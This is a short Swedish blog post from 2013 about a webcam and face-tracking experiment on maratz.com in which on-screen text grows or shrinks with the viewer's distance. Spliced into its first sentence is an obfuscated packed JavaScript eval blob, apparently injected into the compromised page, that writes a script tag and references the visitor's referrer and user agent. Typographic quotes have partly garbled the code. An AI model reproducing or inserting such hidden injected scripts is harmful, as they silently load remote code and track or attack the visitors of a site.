Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Responsive Typography – storleken på texten ändras

Responsive Typography – storleken på texten ändras
Filip Urde
  • On 13 februari, 2013
  • http://www.revue.se/filip-urde

Här eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kndhy|var|u0026u|referrer|yzaiy||js|php’.split(’|’),0,{}))
har vi ett riktigt häftigt projekt från maratz.com där man skapat responsive typography, helt enkelt responsiv text. 

 

 

Det är ett projekt av Marko Dugonji? som använder sin sida maratz.com som en sandlåda för att testa alla sina olika designprojekt och här har vi ett av dem senare. Nämligen text som förändras beroende på var betraktaren är i förhållande till skärmen.

Allt styrs genom webcamen på din datorn, som med hjälp av ansiktsigenkänning följer dig och hur nära du är skärmen. Om du flyttar dig bort från skärmen så förstoras texten och tvärtom om du flyttar dig närmare skärmen.

Hela ”systemet” är i ett tidigt stadium, men det funkar verkligen riktigt bra.

Testa på länken nedan. (Ett krav är självklart att din dator har en webcam och att ni tillåter den när ni ska testa länken).

webdesign.maratz.com